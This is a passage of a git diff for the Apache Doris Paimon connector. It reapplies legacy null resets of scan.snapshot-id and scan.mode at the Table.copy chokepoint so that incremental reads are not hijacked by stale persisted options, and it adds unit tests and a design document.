incremental-between*} keys (snapshot/handle stay null-free), and the + * two legacy null resets are reintroduced LOCALLY at the {@code Table.copy} chokepoint via {@link + * #applyResetsIfIncremental}, where paimon's {@code copyInternal} (1.3.1: {@code v == null ? + * options.remove(k) : options.put(k, v)}) consumes them to clear the stale pin — the nulls are + * created and discarded at copy time, never stored, serialized, or placed in the SPI. */ public final class PaimonIncrementalScanParams { @@ -74,7 +80,9 @@ private PaimonIncrementalScanParams() { * (in place of the legacy {@code UserException}) with the SAME message strings. * * @param params the raw Doris incremental-read window arguments - * @return the paimon scan option map (null-valued reset keys stripped — see class doc) + * @return the paimon scan option map (non-null {@code incremental-between*} keys only; the legacy + * null {@code scan.snapshot-id}/{@code scan.mode} resets are reapplied at copy time by + * {@link #applyResetsIfIncremental} — see class doc) */ public static Map validate(Map params) { // Check if snapshot-based parameters exist @@ -220,17 +228,16 @@ public static Map validate(Map params) { } // Fill the result map based on parameter combinations. - // BENIGN DIVERGENCE (see class doc): legacy seeds PAIMON_SCAN_SNAPSHOT_ID=null and - // PAIMON_SCAN_MODE=null here (lines 842-843) as defensive RESETS against a base Table that - // may have inherited a prior scan.snapshot-id/scan.mode. The connector resolves a FRESH Table - // per query (no inherited keys), so these null resets are a no-op in EFFECT; and - // ConnectorMvccSnapshot.Builder.property rejects null values. So we DO NOT seed the null keys - // (stripping them is byte-parity on a freshly-loaded base table) and emit only the non-null - // incremental-between* keys below. + // NULL RESETS (see class doc + FIX-INCR-SCAN-RESET): legacy seeds PAIMON_SCAN_SNAPSHOT_ID=null + // and PAIMON_SCAN_MODE=null here (lines 842-843) as defensive RESETS against a base Table that + // PERSISTS a stale scan.snapshot-id/scan.mode. Those resets ARE required, but the null values + // must NOT enter the shared ConnectorMvccSnapshot SPI (null-free by contract). So we emit ONLY + // the non-null incremental-between* keys here; the two null resets are reapplied at the + // Table.copy chokepoint via applyResetsIfIncremental(...). Map paimonScanParams = new HashMap<>(); if (hasSnapshotParams) { - // Legacy re-seeds PAIMON_SCAN_MODE=null here (line 846); stripped (see above). + // Legacy re-seeds PAIMON_SCAN_MODE=null here (line 846); reapplied at copy time (see above). if (hasStartSnapshotId && !hasEndSnapshotId) { // Only startSnapshotId is specified throw new DorisConnectorException( @@ -266,4 +273,48 @@ public static Map validate(Map params) { return paimonScanParams; } + + /** + * Reapplies legacy's defensive null resets of {@code scan.snapshot-id}/{@code scan.mode} at the + * {@code Table.copy} chokepoint (FIX-INCR-SCAN-RESET). Legacy + * {@code PaimonScanNode.validateIncrementalReadParams:842-843,846} seeds both keys to {@code null} + * and applies them via {@code baseTable.copy(...)}; a base table that PERSISTS a stale + * {@code scan.snapshot-id}/{@code scan.mode} (via {@code ALTER TABLE SET} / {@code TBLPROPERTIES} / + * {@code table-default.*}) would otherwise collide with {@code incremental-between} — paimon + * 1.3.1 {@code Table.copy} then THROWS ({@code "[incremental-between] must be null when you set + * [scan.snapshot-id,scan.tag-name]"}) or silently downgrades the read to {@code FROM_SNAPSHOT} at + * the stale id (wrong @incr rows). + * + *

      The reset is applied here, not in {@link #validate}, so the shared {@link + * org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot} SPI type and {@code + * PaimonTableHandle.scanOptions} stay null-free; the null-valued map is created locally and handed + * straight to paimon {@code copyInternal} ({@code v == null ? options.remove(k) : options.put(k, + * v)}), which consumes the nulls to remove the stale options. + * + *

      Gated on the presence of an incremental key ({@code incremental-between} OR + * {@code incremental-between-timestamp}) — every successful {@link #validate} output carries + * exactly one, and no non-incremental scan-option producer emits either (snapshot/timestamp pins + * emit {@code scan.snapshot-id}, tag pins emit {@code scan.tag-name}). So a non-incremental pin is + * returned UNCHANGED and its legitimate {@code scan.snapshot-id} is never clobbered. Scope is + * strict legacy parity: {@code scan.snapshot-id} + {@code scan.mode} only. + * + * @param scanOptions the handle's scan options about to be passed to {@code Table.copy} + * @return for an incremental scan, a NEW map seeded with the two null resets then the original + * options; otherwise {@code scanOptions} unchanged (same reference) + */ + public static Map applyResetsIfIncremental(Map scanOptions) { + if (scanOptions == null || scanOptions.isEmpty()) { + return scanOptions; + } + if (!scanOptions.containsKey(PAIMON_INCREMENTAL_BETWEEN) + && !scanOptions.containsKey(PAIMON_INCREMENTAL_BETWEEN_TIMESTAMP)) { + return scanOptions; + } + // HashMap (not Map.of / immutable) — it must hold null VALUES (the reset markers). + Map withResets = new HashMap<>(); + withResets.put(PAIMON_SCAN_SNAPSHOT_ID, null); + withResets.put(PAIMON_SCAN_MODE, null); + withResets.putAll(scanOptions); + return withResets; + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 5df75e35a7a394..589554532ea591 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -249,7 +249,11 @@ Table resolveScanTable(PaimonTableHandle paimonHandle) { Table table = resolveTable(paimonHandle); Map scanOptions = paimonHandle.getScanOptions(); if (scanOptions != null && !scanOptions.isEmpty()) { - return table.copy(scanOptions); + // FIX-INCR-SCAN-RESET: for an @incr read, reapply legacy's null reset of + // scan.snapshot-id/scan.mode here (the single Table.copy chokepoint shared by both the + // native/JNI scan path and the JNI serialized-table path) so a stale persisted pin on the + // base table cannot hijack incremental-between. Non-incremental pins pass through unchanged. + return table.copy(PaimonIncrementalScanParams.applyResetsIfIncremental(scanOptions)); } return table; } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java index a094d53a8bb840..68029a03b59345 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java @@ -683,14 +683,17 @@ public void resolveIncrementalDoesNotEmitScanSnapshotId() { // assertNull below + the applySnapshot end-to-end test go red. Assertions.assertNull(snap.getProperties().get("scan.snapshot-id"), "@incr must NOT emit scan.snapshot-id (it would conflict with incremental-between)"); - // And the null-reset keys legacy seeded (scan.snapshot-id / scan.mode) must be ABSENT - // (stripped), NOT present-with-null. WHY: ConnectorMvccSnapshot rejects null values, and a - // fresh per-query Table has no inherited scan.* keys to reset, so stripping is byte-parity. - // MUTATION: re-introducing the null seeds -> containsKey true (or a build-time NPE) -> red. + // And the null-reset keys legacy seeded (scan.snapshot-id / scan.mode) must be ABSENT here, + // NOT present-with-null. WHY (FIX-INCR-SCAN-RESET): the resolved ConnectorMvccSnapshot is the + // shared, source-agnostic SPI type and is null-free by contract (Builder.property rejects null; + // getProperties() is "never null"). The legacy null resets ARE required (a base table can + // persist a stale scan.snapshot-id/scan.mode), but they are reapplied LATER at the Table.copy + // chokepoint by PaimonIncrementalScanParams.applyResetsIfIncremental — never on this snapshot. + // MUTATION: re-introducing the null seeds here -> containsKey true (or a build-time NPE) -> red. Assertions.assertFalse(snap.getProperties().containsKey("scan.snapshot-id"), - "the legacy null scan.snapshot-id reset must be STRIPPED, not present-with-null"); + "the resolved snapshot must stay null-free — the scan.snapshot-id reset is reapplied at copy"); Assertions.assertFalse(snap.getProperties().containsKey("scan.mode"), - "the legacy null scan.mode reset must be STRIPPED, not present-with-null"); + "the resolved snapshot must stay null-free — the scan.mode reset is reapplied at copy"); } @Test diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java index 908d7fb1f0804c..da419e3dcc4138 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParamsTest.java @@ -31,8 +31,11 @@ * a rule matters (a wrong window silently reads the WRONG incremental diff -> wrong rows), and pins * the EXACT legacy error message so the connector's {@link DorisConnectorException} stays parity with * the legacy {@code UserException}. The two parameter groups (snapshot-based vs timestamp-based) are - * mutually exclusive; the produced map carries ONLY the non-null {@code incremental-between*} keys - * (the legacy null {@code scan.snapshot-id}/{@code scan.mode} resets are STRIPPED). + * mutually exclusive; {@link PaimonIncrementalScanParams#validate} carries ONLY the non-null + * {@code incremental-between*} keys (so the shared {@code ConnectorMvccSnapshot} SPI / handle stay + * null-free), and the legacy null {@code scan.snapshot-id}/{@code scan.mode} resets are reapplied at + * the {@code Table.copy} chokepoint by {@link PaimonIncrementalScanParams#applyResetsIfIncremental} + * (FIX-INCR-SCAN-RESET) — covered by the {@code applyResetsIfIncremental*} cases below. */ public class PaimonIncrementalScanParamsTest { @@ -225,19 +228,85 @@ public void bothTimestampsProduceIncrementalBetweenTimestamp() { } @Test - public void nullResetKeysAreStrippedNotPresentWithNull() { - // WHY (the documented benign divergence): legacy SEEDS scan.snapshot-id=null and scan.mode=null - // (lines 842-843/846) as defensive resets against an inherited base Table. The connector loads a - // FRESH Table per query (nothing to reset) and ConnectorMvccSnapshot rejects null values, so the - // port STRIPS these — they must be ABSENT, not present-with-null. Stripping is byte-parity in - // EFFECT on a freshly-loaded base. MUTATION: re-seeding the null keys -> containsKey true -> red. + public void validateKeepsTheSnapshotPropertiesNullFree() { + // WHY (FIX-INCR-SCAN-RESET): legacy SEEDS scan.snapshot-id=null and scan.mode=null (lines + // 842-843/846) as defensive resets. Those resets ARE required (a base table can persist a stale + // scan.snapshot-id/scan.mode), but the null values must NOT enter validate()'s output, because + // that map flows into the SHARED ConnectorMvccSnapshot SPI / PaimonTableHandle.scanOptions, + // which are null-free by contract (Builder.property rejects null; getProperties() is "never + // null"). So validate() emits ONLY the non-null incremental-between* keys; the two null resets + // are reapplied later at the Table.copy chokepoint by applyResetsIfIncremental (see the cases + // below). MUTATION: emitting the reset keys here (with null) -> containsValue(null) true -> red. Map out = PaimonIncrementalScanParams.validate( params("startSnapshotId", "1", "endSnapshotId", "5")); Assertions.assertFalse(out.containsKey("scan.snapshot-id"), - "the legacy null scan.snapshot-id reset must be STRIPPED (absent), not present-with-null"); + "validate() must not emit scan.snapshot-id — the reset is reapplied at the copy chokepoint"); Assertions.assertFalse(out.containsKey("scan.mode"), - "the legacy null scan.mode reset must be STRIPPED (absent), not present-with-null"); + "validate() must not emit scan.mode — the reset is reapplied at the copy chokepoint"); Assertions.assertFalse(out.containsValue(null), - "the produced option map must contain NO null values (ConnectorMvccSnapshot rejects them)"); + "validate() output feeds the null-free ConnectorMvccSnapshot SPI; it must contain NO nulls"); + } + + // ==================== applyResetsIfIncremental — the Table.copy-chokepoint reset (FIX-INCR-SCAN-RESET) + + @Test + public void applyResetsIfIncrementalSeedsNullResetsForSnapshotWindow() { + // WHY: an @incr scan whose options carry incremental-between must reset a stale persisted + // scan.snapshot-id/scan.mode to null BEFORE Table.copy, or paimon throws ("[incremental-between] + // must be null when you set [scan.snapshot-id,...]") or silently downgrades to FROM_SNAPSHOT + // (wrong rows). paimon copyInternal consumes a null value as options.remove(key). MUTATION: + // not seeding the nulls -> the reset keys are absent -> stale pin survives -> red. + Map out = PaimonIncrementalScanParams.applyResetsIfIncremental( + params("incremental-between", "3,5")); + Assertions.assertTrue(out.containsKey("scan.snapshot-id") && out.get("scan.snapshot-id") == null, + "incremental scan must carry scan.snapshot-id=null (the copy-time reset of a stale pin)"); + Assertions.assertTrue(out.containsKey("scan.mode") && out.get("scan.mode") == null, + "incremental scan must carry scan.mode=null (the copy-time reset of a stale pin)"); + Assertions.assertEquals("3,5", out.get("incremental-between"), + "the original incremental-between window must be preserved"); + } + + @Test + public void applyResetsIfIncrementalSeedsNullResetsForTimestampWindow() { + // WHY: the timestamp @incr group (incremental-between-timestamp) needs the SAME reset as the + // snapshot group — the detector must recognize BOTH incremental keys, else a timestamp @incr + // over a table with a persisted scan.snapshot-id breaks. MUTATION: detecting only + // incremental-between -> timestamp window gets no reset -> red. + Map out = PaimonIncrementalScanParams.applyResetsIfIncremental( + params("incremental-between-timestamp", "100,200")); + Assertions.assertTrue(out.containsKey("scan.snapshot-id") && out.get("scan.snapshot-id") == null, + "timestamp incremental scan must also carry scan.snapshot-id=null"); + Assertions.assertTrue(out.containsKey("scan.mode") && out.get("scan.mode") == null, + "timestamp incremental scan must also carry scan.mode=null"); + Assertions.assertEquals("100,200", out.get("incremental-between-timestamp"), + "the original incremental-between-timestamp window must be preserved"); + } + + @Test + public void applyResetsIfIncrementalPassesThroughNonIncrementalPins() { + // WHY (no false positive): a genuine snapshot-id / tag time-travel pin must NOT be touched — + // injecting scan.snapshot-id=null here would CLOBBER the legitimate pin and read the wrong + // version. The helper resets iff an incremental key is present. MUTATION: unconditionally + // seeding the resets -> a scan.snapshot-id pin loses its value / gains scan.mode=null -> red. + Map snapshotPin = params("scan.snapshot-id", "5"); + Assertions.assertSame(snapshotPin, PaimonIncrementalScanParams.applyResetsIfIncremental(snapshotPin), + "a scan.snapshot-id pin is non-incremental -> returned unchanged (same reference)"); + Map tagPin = params("scan.tag-name", "t"); + Map tagOut = PaimonIncrementalScanParams.applyResetsIfIncremental(tagPin); + Assertions.assertSame(tagPin, tagOut, "a scan.tag-name pin is non-incremental -> returned unchanged"); + Assertions.assertFalse(tagOut.containsKey("scan.mode"), + "a non-incremental pin must NOT gain a scan.mode reset"); + } + + @Test + public void applyResetsIfIncrementalIsNoOpForEmptyOrNull() { + // WHY: the latest-read / no-scan-options path (empty or null map) must pass through untouched — + // resolveScanTable only copies when scanOptions is non-empty, and a no-op here keeps that path + // allocation-free and reset-free. + Map empty = params(); + Assertions.assertSame(empty, PaimonIncrementalScanParams.applyResetsIfIncremental(empty), + "an empty scan-options map must be returned unchanged"); + Assertions.assertNull(PaimonIncrementalScanParams.applyResetsIfIncremental(null), + "a null scan-options map must be returned unchanged (null)"); } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 20ef6b1af1dab6..0907365dd94077 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -411,6 +411,55 @@ public void resolveScanTableWithoutScanOptionsDoesNotCopy() { "an un-pinned handle must NOT invoke Table.copy"); } + @Test + public void resolveScanTableResetsStalePinForIncrementalRead(@TempDir Path warehouse) throws Exception { + // A REAL paimon table (not FakePaimonTable, whose copy() is a no-op recorder that cannot + // reproduce paimon's merge/remove/immutability) that PERSISTS a stale scan.snapshot-id/scan.mode + // in its schema options — legal & mutable via TBLPROPERTIES / ALTER TABLE SET / table-default.*. + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("id", DataTypes.INT()) + .column("val", DataTypes.BIGINT()) + .primaryKey("id") + .option("bucket", "1") + .option("scan.snapshot-id", "1") + .option("scan.mode", "from-snapshot") + .build(), false); + Table base = catalog.getTable(id); + Assertions.assertEquals("1", base.options().get("scan.snapshot-id"), + "fixture precondition: the base table must persist a stale scan.snapshot-id"); + + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = new PaimonTableHandle( + "db", "t", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(base); + // applySnapshot's INCREMENTAL pin produces exactly this scanOptions map (incremental-between + // ONLY — the null resets are NOT carried through the SPI; they are reapplied at copy time). + PaimonTableHandle incrHandle = handle.withScanOptions( + Collections.singletonMap("incremental-between", "3,5")); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Table scanTable = provider.resolveScanTable(incrHandle); + + // WHY (FIX-INCR-SCAN-RESET): an @incr read over a base table that persists a stale + // scan.snapshot-id must reset it to null BEFORE Table.copy (the single chokepoint shared by + // the native/JNI scan path planScanInternal and the JNI serialized-table path + // getScanNodeProperties). Without the reset, paimon 1.3.1 THROWS at copy() + // ("[incremental-between] must be null when you set [scan.snapshot-id,scan.tag-name]") — so + // resolveScanTable would throw before reaching these assertions — or silently downgrades to + // FROM_SNAPSHOT at the stale id (wrong @incr rows). With the reset, the stale pin is removed + // and the incremental window survives. MUTATION: dropping applyResetsIfIncremental in + // resolveScanTable -> copy throws (or returns a table still carrying scan.snapshot-id) -> red. + Assertions.assertFalse(scanTable.options().containsKey("scan.snapshot-id"), + "the stale persisted scan.snapshot-id must be reset (removed) for an @incr read"); + Assertions.assertEquals("3,5", scanTable.options().get("incremental-between"), + "the @incr window (incremental-between) must survive the copy"); + } + } + @Test public void resolveTableUsesTransientWithoutReload() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); diff --git a/plan-doc/FIX-INCR-SCAN-RESET-design.md b/plan-doc/FIX-INCR-SCAN-RESET-design.md new file mode 100644 index 00000000000000..19a429758461ca --- /dev/null +++ b/plan-doc/FIX-INCR-SCAN-RESET-design.md @@ -0,0 +1,179 @@ +# FIX-INCR-SCAN-RESET — Design + +> Source: `reviews/P5-paimon-rereview3-2026-06-12.md` (P2-1, **MAJOR**; was NIT in rereview2); +> task `task-list-P5-rereview3-fixes.md` FIX-3. **Connector-only, no BE / no SPI change.** +> Design red-team (5 skeptics + completeness critic, `wf_ffd11631-ed2`): **DESIGN-SOUND**, unanimous +> **Option 2** (inject the reset at the `Table.copy` chokepoint; keep the shared SPI null-free). + +## Problem +A Paimon `@incr(...)` incremental read can read the **wrong rows** — or hard-fail — when the base table +**persists** a `scan.snapshot-id` / `scan.mode` option (legal & mutable via `ALTER TABLE SET`, +`TBLPROPERTIES`, or `table-default.*` catalog options). The connector's `@incr` path produces only the +`incremental-between*` scan options and applies them with `Table.copy(...)`, but it **dropped** legacy's +defensive null-reset of `scan.snapshot-id` / `scan.mode`. So the freshly-loaded base table's persisted +`scan.snapshot-id` survives into the copied table and collides with `incremental-between`. + +Two concrete failure modes (both verified against paimon 1.3.1; the second was reproduced **empirically** +offline by the red-team): +- **Hard throw** (persisted `scan.snapshot-id` present): `Table.copy({incremental-between=…})` throws + `IllegalArgumentException: "[incremental-between] must be null when you set + [scan.snapshot-id,scan.tag-name]"`. +- **Silent wrong rows** (persisted `scan.snapshot-id` with no `scan.mode`): `CoreOptions.setDefaultValues` + sets `scan.mode=FROM_SNAPSHOT` *before* the `INCREMENTAL` branch, and `startupMode()` checks + `SCAN_SNAPSHOT_ID` before `INCREMENTAL_BETWEEN` → the read becomes `FROM_SNAPSHOT` at the stale id and + `incremental-between` is silently ignored. The stale `scan.snapshot-id` (a `SCAN_KEY`) also pins the + schema to the wrong version via `tryTimeTravel`. + +## Root Cause +`PaimonIncrementalScanParams.validate()` (lines 222-265) intentionally **strips** legacy's +`paimonScanParams.put("scan.snapshot-id", null)` and `put("scan.mode", null)` (legacy +`PaimonScanNode.validateIncrementalReadParams:842-843,846`, applied via +`baseTable.copy(getIncrReadParams())` at `:896`). The strip was justified by a rationale that is **wrong**: +the class javadoc (lines 39-49) and the inline note (222-229) claim the reset is "byte-parity in EFFECT on +a freshly-loaded base table" because the connector loads a fresh `Table` per query (so "nothing to reset") +and because `ConnectorMvccSnapshot` rejects null values. + +Both premises fail: +- **Per-query freshness ≠ option freshness.** The base table comes straight from `catalog.getTable(...)` + (`CatalogBackedPaimonCatalogOps.getTable`), whose options are built from the **persisted** `TableSchema` + (`FileStoreTable.options() == schema().options()`). Persisted `scan.*` is therefore present on every + fresh load. The connector strips nothing before `copy`. +- **Why the reset matters.** paimon 1.3.1 `AbstractFileStoreTable.copyInternal` merges dynamic options + with exactly `v == null ? options.remove(k) : options.put(k, v)`. A **null** value is the SDK's documented + reset (remove) mechanism — the only way to clear a persisted `scan.snapshot-id`/`scan.mode`. `scan.mode` + and `scan.snapshot-id` are **not** `@Immutable` in 1.3.1, so `copy`'s `checkImmutability` + (`Objects.equals(old,new)` → else `SchemaManager.checkAlterTableOption`) does **not** throw on the reset; + for a non-persisted key (`old==null`, `new==null`) it is a pure no-op. + +## Design — Option 2 (chosen) +Keep `validate()` emitting **only** the non-null `incremental-between*` keys (so the shared SPI type +`ConnectorMvccSnapshot` and `PaimonTableHandle.scanOptions` stay **null-free** — preserving the +`Builder.property(k,v)` `requireNonNull` contract, the `getProperties()` "never null" javadoc, and the two +existing tests that pin "no null values"). Reintroduce legacy's two null resets **locally at the single +`Table.copy` chokepoint**, where the nulls are created and immediately consumed by `copyInternal`'s +`options.remove(k)` — never stored, never serialized, never placed in the SPI. + +Add a helper **owned by `PaimonIncrementalScanParams`** (the rightful home of the incremental-key +knowledge), gated on the presence of an incremental key: + +```java +public static Map applyResetsIfIncremental(Map scanOptions) { + if (scanOptions == null || scanOptions.isEmpty()) { + return scanOptions; + } + if (!scanOptions.containsKey(PAIMON_INCREMENTAL_BETWEEN) + && !scanOptions.containsKey(PAIMON_INCREMENTAL_BETWEEN_TIMESTAMP)) { + return scanOptions; // non-incremental pin → unchanged (no false positive) + } + Map withResets = new HashMap<>(); + withResets.put(PAIMON_SCAN_SNAPSHOT_ID, null); // legacy reset: clear a persisted stale pin at copy time + withResets.put(PAIMON_SCAN_MODE, null); + withResets.putAll(scanOptions); + return withResets; +} +``` + +Call it inside `PaimonScanPlanProvider.resolveScanTable` (the lone `table.copy(scanOptions)` site, lines +248-255): + +```java +return table.copy(PaimonIncrementalScanParams.applyResetsIfIncremental(scanOptions)); +``` + +This single edit covers **both** `resolveScanTable` callers — `planScanInternal:292` (native/JNI scan) and +`getScanNodeProperties:515` (JNI serialized-table for BE, which serializes the **post-copy** table) — through +the shared chokepoint, so native and JNI `@incr` reset identically. + +**Detection soundness** (verified): every successful `validate()` output contains exactly one of +`incremental-between` / `incremental-between-timestamp` (snapshot group always emits `incremental-between`; +timestamp group always emits `incremental-between-timestamp`; `incremental-between-scan-mode` is only ever +emitted *alongside* `incremental-between`). And **no** non-incremental scan-options producer emits either +key (`SNAPSHOT_ID`/`TIMESTAMP` → `scan.snapshot-id`; `TAG` → `scan.tag-name`; `BRANCH` routed before the +properties path; latest-pin → `scan.snapshot-id` only). So the helper resets **iff** the scan is +incremental — it never clobbers a legitimate `scan.snapshot-id`/`scan.tag-name` pin. + +**Scope = strict legacy parity:** reset **only** `scan.snapshot-id` + `scan.mode` (exactly legacy +`PaimonScanNode:842-843,846`). Do **not** broaden to the other `SCAN_KEYS` (`scan.timestamp`, +`scan.timestamp-millis`, `scan.tag-name`, `scan.watermark`) that could also hijack `startupMode` — legacy +did not reset those, and the task-list pins the two-key scope. + +### Why not Option 1 (re-add the nulls in `validate()`, ride through the SPI) +Mechanically it works (the nulls survive `ConnectorMvccSnapshot.Builder.properties(Map)`'s `putAll` and +the handle, and `copy` resolves them), but it is the wrong design: it **breaks the shared SPI's null-free +contract** for future consumers (iceberg/hudi), depends on a **silent gap** in `properties(Map)` (it lacks +the per-value `requireNonNull` that `property(k,v)` has — a future, correct hardening would silently +re-break `@incr`), **inverts** two existing green tests + the `getProperties()` javadoc, and leaks a +paimon-SDK quirk (`copy`: null == remove) into a source-agnostic type. Option 2 achieves identical engine +behavior with none of that. + +## Implementation Plan +1. **`PaimonIncrementalScanParams.java`** — add `public static Map + applyResetsIfIncremental(Map)` using the existing private constants + (`PAIMON_SCAN_SNAPSHOT_ID`, `PAIMON_SCAN_MODE`, `PAIMON_INCREMENTAL_BETWEEN`, + `PAIMON_INCREMENTAL_BETWEEN_TIMESTAMP`) — **no string literals**, so the detector key set cannot drift + from the emitter set. Javadoc the WHY (legacy reset at copy time; nulls consumed by `copyInternal`). +2. **`PaimonScanPlanProvider.java`** — in `resolveScanTable` (248-255), wrap the `table.copy(scanOptions)` + argument with `PaimonIncrementalScanParams.applyResetsIfIncremental(...)`. Keep the existing + `scanOptions != null && !scanOptions.isEmpty()` guard unchanged. +3. **Doc fanout (Rule 9/12)** — correct the now-refuted "byte-parity on a freshly-loaded base table" + rationale: `PaimonIncrementalScanParams` class javadoc (39-49) + inline note (222-229/233); the + `INCREMENTAL`-case comments in `PaimonConnectorMetadata` (≈410-413, 490-492, 505-506). Reword to: the + snapshot/SPI stays null-free **by design**, and the legacy null resets are reapplied at the `Table.copy` + chokepoint via `applyResetsIfIncremental`. + +## Risk Analysis +- **No SPI / no BE change.** Connector-only; import-gate clean (helper uses only `java.util` + paimon SDK). +- **Common path unaffected:** `applyResetsIfIncremental` returns the input map **unchanged** for every + non-incremental scan (snapshot/tag/timestamp pin, latest read) and for empty options — so + `resolveScanTableAppliesSnapshotPinViaCopy` / `…WithoutScanOptionsDoesNotCopy` stay green. The extra map + allocation happens only on `@incr` reads (negligible). +- **paimon-version coupling:** the reset relies on 1.3.1 semantics (`null` → remove; `scan.*` mutable). A + future paimon that marks these `@Immutable` would make the reset throw. Mitigated by the real-table test + asserting `copy` with the resets does **not** throw against the bundled jar (fails loud on upgrade). +- **Forward-compat:** if a *future* `ConnectorTimeTravelSpec.Kind` ever emitted an `incremental-between*` + key as a side property **and** wanted a real `scan.snapshot-id` pin, the helper would clobber it. Today + only `INCREMENTAL` emits these keys — a caveat, not a current defect; co-locating the detector keys with + the emitter constants mitigates rename drift. + +## Test Plan +### Unit Tests (connector, offline) +- **`PaimonScanPlanProviderTest.resolveScanTableResetsStalePinForIncrementalRead` (NEW, real table — the + fail-before/pass-after gate).** Build a real paimon 1.3.1 `FileSystemCatalog` + `LocalFileIO` table under + `@TempDir` (reuse the existing `buildRealDataSplit` recipe), created with + `.option("scan.snapshot-id","1").option("scan.mode","from-snapshot")` and at least one committed row so + `tableSchema.options()` persists `scan.snapshot-id`. Seat it on the handle + (`handle.setPaimonTable(realTable)`), pin `handle.withScanOptions({incremental-between:"3,5"})`, call + `provider.resolveScanTable(handle)`. **Before fix:** `copy` throws `IllegalArgumentException` (or returns + a table still carrying `scan.snapshot-id`). **After fix:** returned `table.options()` has **no** + `scan.snapshot-id` and `incremental-between=3,5`. (A `FakePaimonTable` test cannot be the gate — + `FakePaimonTable.copy` is a no-op recorder that does not implement merge/remove, so it can't fail-before; + Rule 9.) +- **`PaimonIncrementalScanParamsTest.applyResetsIfIncrementalSeedsNullResetsForIncremental` (NEW, unit).** + `applyResetsIfIncremental({incremental-between:"3,5"})` → map contains key `scan.snapshot-id` with **null** + value AND key `scan.mode` with **null** value AND `incremental-between=3,5`; same for + `{incremental-between-timestamp:"100,200"}`. Encodes WHY: nulls reach `copy` to remove a stale persisted + pin. +- **`PaimonIncrementalScanParamsTest.applyResetsIfIncrementalPassesThroughNonIncremental` (NEW, unit).** + `applyResetsIfIncremental({scan.snapshot-id:"5"})`, `({scan.tag-name:"t"})`, and an empty/null map return + the input **unchanged** (no `scan.mode` injected, no null values) — the no-false-positive invariant that + protects the snapshot/tag/timestamp pin paths. + +### Existing tests +- **No structural change.** `PaimonIncrementalScanParamsTest.nullResetKeysAreStrippedNotPresentWithNull` + (228-242) and `PaimonConnectorMetadataMvccTest.resolveIncrementalDoesNotEmitScanSnapshotId` (684-693) + **stay green** (validate()/snapshot are unchanged) — do **not** invert them. Reword only their inline + WHY-comments (currently "byte-parity on a freshly-loaded base") to "the SPI/snapshot stays null-free by + design; the legacy null resets are reapplied at the `Table.copy` chokepoint in `resolveScanTable`". + +### E2E +- Live `@incr`-over-persisted-`scan.snapshot-id` regression is **CI-gated** (`enablePaimonTest=false`) — not + run in this environment; noted as gated, not claimed. The offline real-table unit test above is the + load-bearing proof. + +## Build / Verify +- `mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl :fe-connector-paimon -am + -Dmaven.build.cache.enabled=false -DfailIfNoTests=false test` → read surefire XML + `MVN_EXIT`. +- `mvn -pl :fe-connector-paimon checkstyle:check`; `bash tools/check-connector-imports.sh`. + +## Commit +`fix: FIX-INCR-SCAN-RESET` — connector-only; carries this design doc (repo convention). From 179ab88720ee0a0f1ac9ad8f900d096450b768ad Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 19:04:26 +0800 Subject: [PATCH 041/128] =?UTF-8?q?docs:=20roll=20HANDOFF=20+=20task-list?= =?UTF-8?q?=20=E2=80=94=20FIX-3=20(P2-1=20MAJOR)=20done,=20next=20FIX-4?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit FIX-3 FIX-INCR-SCAN-RESET committed f08bc22b9bd. Adds FIX-INCR-SCAN-RESET-summary.md, marks FIX-3 done in the task-list, rolls HANDOFF to FIX-4 (FIX-FECONF-STORAGE-PARITY). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/FIX-INCR-SCAN-RESET-summary.md | 58 ++++++++++++ plan-doc/HANDOFF.md | 115 +++++++++++++---------- plan-doc/task-list-P5-rereview3-fixes.md | 12 ++- 3 files changed, 133 insertions(+), 52 deletions(-) create mode 100644 plan-doc/FIX-INCR-SCAN-RESET-summary.md diff --git a/plan-doc/FIX-INCR-SCAN-RESET-summary.md 